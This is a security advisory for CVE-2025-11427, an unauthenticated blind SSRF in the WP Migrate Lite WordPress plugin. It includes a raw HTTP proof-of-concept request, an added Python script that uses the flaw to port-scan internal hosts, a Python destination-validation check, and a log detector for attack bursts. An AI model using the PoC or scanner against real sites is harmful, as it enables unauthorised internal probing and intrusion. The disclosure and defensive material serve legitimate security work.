WP Migrate Lite (200,000+ active installations) is a widely used WordPress migration plugin for synchronizing databases and media between sites. Migration workflows require remote communication between WordPress instances, which makes the request-handling logic highly sensitive to authentication, nonce validation, and strict URL allow-listing. In WP Migrate Lite 2.7.5 (affected versions up to and including 2.7.6) we identified CVE-2025-11427, an unauthenticated blind Server-Side Request Forgery (SSRF) reachable through a publicly exposed AJAX endpoint. By sending crafted parameters to admin-ajax.php?action=wpmdb_flush without any WordPress cookies, an attacker can make the server issue a backend wp_remote_post() request to an arbitrary host, including internal services on 127.0.0.1, RFC 1918 networks, or cloud metadata endpoints, enabling internal probing, service interaction, and potential chained compromise.
| Field | Value |
|---|---|
| CVE | CVE-2025-11427 |
| Plugin version | WP Migrate Lite <= 2.7.6 |
| Severity | High |
| All-time downloads | 7 802 873 |
| Active installations | 200 000+ |
| Publicly published | November 17, 2025 |
| Last updated | November 17, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| References | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11427 ; https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-migrate-db/wp-migrate-lite-276-unauthenticated-blind-server-side-request-forgery |
Timeline
| Date | Event |
|---|---|
| September 24, 2025 | Plugin testing and vulnerability detection in the WP Migrate Lite – Migration Made Easy plugin have been completed |
| September 24, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| November 17, 2025 | Registered CVE-2025-11427 |
Discovery of the Vulnerability
The root cause is an unauthenticated handler registered as wp_ajax_nopriv_wpmdb_flush, implemented in class/Common/Migration/Flush.php. This handler processes migration state without enforcing a capability check (current_user_can) or a CSRF nonce (check_ajax_referer). When the option wpmdb_migration_state is absent (or treated as a valid array), the code path falls back to trusting incoming request data. If the attacker supplies intent=push, the plugin constructs a remote target endpoint using attacker-controlled url via Util::ajax_url($url) (effectively $url/wp-admin/admin-ajax.php) and calls the remote via RemotePost::post() / wp_remote_post(). This results in blind SSRF: the attacker cannot always directly read the response body, but they can reliably trigger server-side requests and observe timing and side effects.
Understanding SSRF attacks
SSRF occurs when an application makes outbound HTTP requests based on untrusted input. In WordPress plugins, SSRF commonly appears in features that connect sites (migration/sync tools), fetch remote resources (image importers), or proxy API calls. The most dangerous SSRF variants allow access to internal services (admin panels on localhost, docker bridges, database management UIs) or cloud instance metadata endpoints such as 169.254.169.254 (AWS IMDS), enabling credential theft and infrastructure takeover. Even “blind” SSRF is highly valuable to attackers for:
- internal port scanning (timing differences)
- triggering internal webhooks/actions
- interacting with services that change state on POST
- chaining with open redirects or callback-based exfiltration
CVE-2025-11427 qualifies as high risk due to unauthenticated reachability and unrestricted destination control.
Exploiting the SSRF Vulnerability
To exploit CVE-2025-11427, an attacker sends the following request without any WordPress cookies (note the empty Cookie header; the body is exactly 42 bytes, matching Content-Length):

PoC:

```http
POST /wordpress/wp-admin/admin-ajax.php?action=wpmdb_flush HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Cookie:
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/plugin-install.php?tab=popular&paged=7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Origin: http://127.0.0.1
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

intent=push&url=http://127.0.0.1:443&key=x
```
- Internal service discovery: Blind SSRF can be used to identify open ports and internal HTTP endpoints through response time and error behavior.
- Interaction with internal admin interfaces: Internal services listening on localhost (CI/CD dashboards, debug endpoints, Redis HTTP proxies, admin panels) may accept requests from the WordPress host.
- Cloud credential exposure (chaining): While this bug is blind, internal endpoints that return credentials may still be exploitable via secondary exfil techniques if any callbacks/logging exist.
- DoS potential: Repeated SSRF requests to slow endpoints or non-routable IPs can exhaust PHP workers or outbound sockets.
- Pivot attacks: In some environments, SSRF to internal WordPress endpoints or admin-ajax routes can be chained with other unauthenticated logic bugs.
Given WP Migrate Lite’s large install base and the unauthenticated nature of the endpoint, exploitation is realistic at scale.
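The following script is an added example (it is not part of the original advisory or of the plugin) showing how the blind primitive above becomes an internal port map: it parameterizes the PoC body (intent=push&url=http://127.0.0.1:PORT&key=x, sent without cookies) and sorts ports by the latency and size of the plugin's reply. The transport is injectable so the sample runs offline against constructed timings; `requests` is only imported for a live target. The open/closed/filtered verdict is a heuristic, and the assumption that the most common fast reply is a connection refusal must be calibrated per target.

```python
"""Blind-SSRF timing/fingerprint probe for the wpmdb_flush endpoint.

Added example, not the advisory's or the plugin's code. The verdict
logic in classify() is a heuristic (assumption: most probed ports are
closed, so the majority fast reply is the refusal fingerprint).
"""
import statistics
import time
from collections import Counter
from urllib.parse import urlencode

AJAX_PATH = "/wp-admin/admin-ajax.php?action=wpmdb_flush"


def build_body(target_url):
    """Form body exactly as in the PoC; ':' and '/' are left unencoded
    so the 127.0.0.1:443 case is the same 42 bytes as the Content-Length
    in the captured request. The key value is arbitrary."""
    return urlencode({"intent": "push", "url": target_url, "key": "x"}, safe=":/")


def http_transport(endpoint, body, timeout):
    """Live transport: POST with no cookies -> (status, reply length, seconds)."""
    import requests  # third-party; not needed for the offline demo
    started = time.monotonic()
    resp = requests.post(endpoint, data=body, timeout=timeout, headers={
        "Content-Type": "application/x-www-form-urlencoded"})
    return resp.status_code, len(resp.content), time.monotonic() - started


def probe_ports(site, ports, transport=http_transport, timeout=10.0,
                internal_host="127.0.0.1", samples=3):
    """Probe each port through the vulnerable endpoint; return {port: record}."""
    endpoint = site.rstrip("/") + AJAX_PATH
    results = {}
    for port in ports:
        body = build_body(f"http://{internal_host}:{port}")
        runs = [transport(endpoint, body, timeout) for _ in range(samples)]
        fingerprint = Counter((s, n) for s, n, _ in runs).most_common(1)[0][0]
        results[port] = {
            "fingerprint": fingerprint,  # (HTTP status, reply length) seen most often
            "median_s": statistics.median([t for _, _, t in runs]),
        }
    return classify(results, timeout)


def classify(results, timeout):
    """Attach a verdict to every record (heuristic):
    - filtered: the back-end request ran into the outbound timeout (dropped);
    - closed:   fast reply with the majority fingerprint (connection refused);
    - open:     fast reply whose fingerprint differs from that majority."""
    fast = {p: r for p, r in results.items() if r["median_s"] < 0.8 * timeout}
    majority = None
    if fast:
        majority = Counter(r["fingerprint"] for r in fast.values()).most_common(1)[0][0]
    for port, rec in results.items():
        if port not in fast:
            rec["verdict"] = "filtered"
        elif rec["fingerprint"] == majority:
            rec["verdict"] = "closed"
        else:
            rec["verdict"] = "open"
    return results


def verdicts(results):
    """Compact {port: verdict} view of probe_ports() output."""
    return {port: rec["verdict"] for port, rec in results.items()}


if __name__ == "__main__":
    # Constructed replies/latencies standing in for a real target.
    simulated = {22: (200, 61, 0.05), 80: (200, 212, 0.04), 443: (200, 61, 0.05),
                 3306: (200, 61, 0.06), 6379: (200, 61, 10.0), 8080: (200, 61, 0.05)}

    def fake_transport(endpoint, body, timeout):
        port = int(body.split("url=")[1].split("&")[0].rsplit(":", 1)[1])
        return simulated[port]

    scan = probe_ports("http://127.0.0.1/wordpress", sorted(simulated),
                       transport=fake_transport)
    for port, rec in scan.items():
        print(f"{port:>5} {rec['verdict']:<8} {rec['fingerprint']} {rec['median_s']:.2f}s")
```

Because the attacker never sees the back-end response, everything rests on side channels: the plugin's own reply (status and length, which may embed the transport error text) and how long the request took. Several samples per port smooth out jitter; a single slow sample is not evidence of a filtered port.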
Recommendations for Improved Security
For maintainers (WP Migrate Lite):
- Remove the `nopriv` registration for `wpmdb_flush` entirely unless there is a strong architectural need. Migration state endpoints should be authenticated-only.
- Enforce capability checks: require `current_user_can('manage_options')` (or a plugin-specific capability) before processing migration state.
- Require nonce verification: add `check_ajax_referer('wpmdb_flush', 'nonce')` and reject requests with a missing or invalid nonce.
- Harden URL handling: if remote connections are required, enforce an allowlist of known migration targets, block loopback/RFC 1918/link-local ranges, and prevent redirect-based bypasses. WordPress already ships `wp_safe_remote_post()` (equivalently `'reject_unsafe_urls' => true`), which runs `wp_http_validate_url()` and refuses loopback and private-range targets unless the `http_request_host_is_external` filter allows them; using it in place of `wp_remote_post()` covers the common cases, and `'redirection' => 0` stops a 3xx from steering the request to an internal host.
- Add network safeguards: set strict timeouts, limit redirects, and log anomalous targets for incident response.
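The destination check that the Discovery section shows is missing (the `url` parameter flows straight into `Util::ajax_url()` and `wp_remote_post()`) and that the URL-hardening recommendation asks for is spelled out below as an added reference implementation in Python. It is not WP Migrate Lite code and not a drop-in PHP patch; it shows the checks the handler has to apply to the attacker-controlled value before any request is issued. The allowlist of peer hosts is an assumed operator setting, the resolver is injectable so the sample runs offline, and the addresses and hostnames in the demo are constructed.

```python
"""Reference destination check for a migration "push" target URL.

Added example, not the plugin's code. It mirrors what Util::ajax_url($url)
builds ($url/wp-admin/admin-ajax.php) but only after the scheme,
credentials, port, allowlist and every resolved address have been checked.
"""
import ipaddress
import socket
from urllib.parse import urlsplit, urlunsplit

DEFAULT_ALLOWED_PORTS = frozenset({80, 443})


def default_resolver(host):
    """Every A/AAAA record for host; a rebinding check needs all of them."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def _as_ip(text):
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None


def is_public_address(text):
    """True only for a globally routable unicast address.

    IPv4-mapped IPv6 (::ffff:127.0.0.1) is unwrapped first so the IPv4
    rules apply. Loopback, RFC 1918, link-local (169.254.0.0/16, where the
    cloud metadata service lives), multicast, reserved and unspecified all
    fail. A non-literal such as a decimal IP ("2130706433") fails here too
    and must go through the resolver instead.
    """
    addr = _as_ip(text)
    if addr is None:
        return False
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_push_target(url, allowed_hosts=None, resolver=default_resolver,
                         allowed_ports=DEFAULT_ALLOWED_PORTS):
    """Return the admin-ajax endpoint derived from url, or raise ValueError.

    allowed_hosts=None skips the allowlist (the IP checks still apply);
    a real deployment should configure it (assumption).
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme must be http or https")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in the URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if port not in allowed_ports:
        raise ValueError(f"port {port} is not allowed")
    if allowed_hosts is not None and host.lower() not in {h.lower() for h in allowed_hosts}:
        raise ValueError(f"{host} is not a configured migration peer")
    # Check every address the name maps to: one public and one internal
    # record (split-horizon DNS, rebinding) must fail just like a literal.
    addresses = [host] if _as_ip(host) else resolver(host)
    if not addresses:
        raise ValueError(f"{host} does not resolve")
    bad = [a for a in addresses if not is_public_address(a)]
    if bad:
        raise ValueError(f"{host} maps to non-public address(es): {bad}")
    path = parts.path.rstrip("/") + "/wp-admin/admin-ajax.php"
    return urlunsplit((parts.scheme, parts.netloc, path, "", ""))


if __name__ == "__main__":
    # Offline stand-in for DNS (constructed data; 8.8.8.8 is just "some public IP").
    fake = {"peer.example.org": ["8.8.8.8"],
            "rebind.example.org": ["8.8.8.8", "10.0.0.5"]}
    peers = ["peer.example.org", "rebind.example.org"]
    for candidate in ("https://peer.example.org", "http://127.0.0.1:443",
                      "http://169.254.169.254/latest/meta-data/",
                      "https://rebind.example.org"):
        try:
            print("ALLOW", validate_push_target(candidate, peers, resolver=lambda h: fake.get(h, [])))
        except ValueError as exc:
            print("DENY ", candidate, "->", exc)
```

Two caveats carry over to the PHP side. Resolve-then-connect leaves a DNS rebinding window between this check and the socket the HTTP client opens, so pin the checked address at connection time where the client allows it. And a validated public host can still answer with a redirect to an internal one, which is why the request should be sent with redirects disabled or with every hop re-validated by the same function.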
For site owners:
- Update to a patched release immediately once available.
- Use a WAF rule to block `action=wpmdb_flush` requests from unauthenticated users.
- Restrict outbound connectivity from the WordPress host (egress filtering) to prevent SSRF pivots; on cloud instances this includes the metadata address 169.254.169.254.
- Monitor access logs for spikes on `/admin-ajax.php?action=wpmdb_flush`.
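The log-monitoring recommendation above, as an added example that is not part of the original advisory: the script parses web server lines in the common "combined" format (the sample lines are constructed), counts POSTs to admin-ajax.php with action=wpmdb_flush per client address, and reports clients that cross a threshold inside a sliding one-minute window. The combined format records neither cookies nor the POST body, so it cannot separate authenticated callers from anonymous ones or show the `url` an attacker supplied; the burst rate is the signal, since a legitimate migration produces a handful of these calls from an administrator's browser, not dozens per minute from a scanner.

```python
"""Spot bursts of wpmdb_flush calls in a combined-format access log.

Added example, not the advisory's code. Lines are assumed to be in
time order, as a web server writes them. The threshold and window are
assumptions to tune per site.
"""
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# action=wpmdb_flush anywhere in the admin-ajax.php query string.
TARGET = re.compile(r'/admin-ajax\.php\?(?:[^ ]*&)?action=wpmdb_flush(?:&|$)')

# Constructed sample: 203.0.113.7 hammers the endpoint without a referer
# (six calls in ten seconds); 198.51.100.4 is an administrator's browser.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Nov/2025:10:00:01 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=wpmdb_flush HTTP/1.1" 200 61 "-" "curl/8.5.0"
198.51.100.4 - - [17/Nov/2025:10:00:02 +0000] "GET /wordpress/wp-admin/plugin-install.php?tab=popular&paged=7 HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Nov/2025:10:00:03 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=wpmdb_flush HTTP/1.1" 200 61 "-" "curl/8.5.0"
203.0.113.7 - - [17/Nov/2025:10:00:05 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=wpmdb_flush HTTP/1.1" 200 61 "-" "curl/8.5.0"
198.51.100.4 - - [17/Nov/2025:10:00:06 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=wpmdb_flush HTTP/1.1" 200 212 "http://127.0.0.1/wordpress/wp-admin/" "Mozilla/5.0"
203.0.113.7 - - [17/Nov/2025:10:00:07 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=wpmdb_flush HTTP/1.1" 200 61 "-" "curl/8.5.0"
203.0.113.7 - - [17/Nov/2025:10:00:09 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=wpmdb_flush HTTP/1.1" 200 61 "-" "curl/8.5.0"
this line is not in combined format and is skipped
203.0.113.7 - - [17/Nov/2025:10:00:11 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=wpmdb_flush HTTP/1.1" 200 61 "-" "curl/8.5.0"
"""


def parse_line(line):
    """One combined-format line -> dict, or None if it does not parse."""
    m = LINE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def flush_records(lines):
    """Yield only POSTs to the wpmdb_flush action."""
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and TARGET.search(rec["path"]):
            yield rec


def count_by_ip(lines):
    """Total wpmdb_flush POSTs per client address."""
    return dict(Counter(rec["ip"] for rec in flush_records(lines)))


def find_bursts(lines, threshold=5, window=timedelta(minutes=1)):
    """{ip: peak count} for clients reaching `threshold` calls in any `window`."""
    recent = defaultdict(deque)
    peaks = {}
    for rec in flush_records(lines):
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peaks[rec["ip"]] = max(peaks.get(rec["ip"], 0), len(q))
    return peaks


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("calls per client:", count_by_ip(lines))
    for ip, peak in find_bursts(lines).items():
        print(f"ALERT {ip}: {peak} wpmdb_flush POSTs within one minute")
```

To also see where the server was told to connect, log the request body at the WAF or enable the anomalous-target logging recommended for maintainers; the access log alone only tells you that the endpoint was hit.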
By taking proactive measures to address SSRF vulnerabilities like CVE-2025-11427 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.

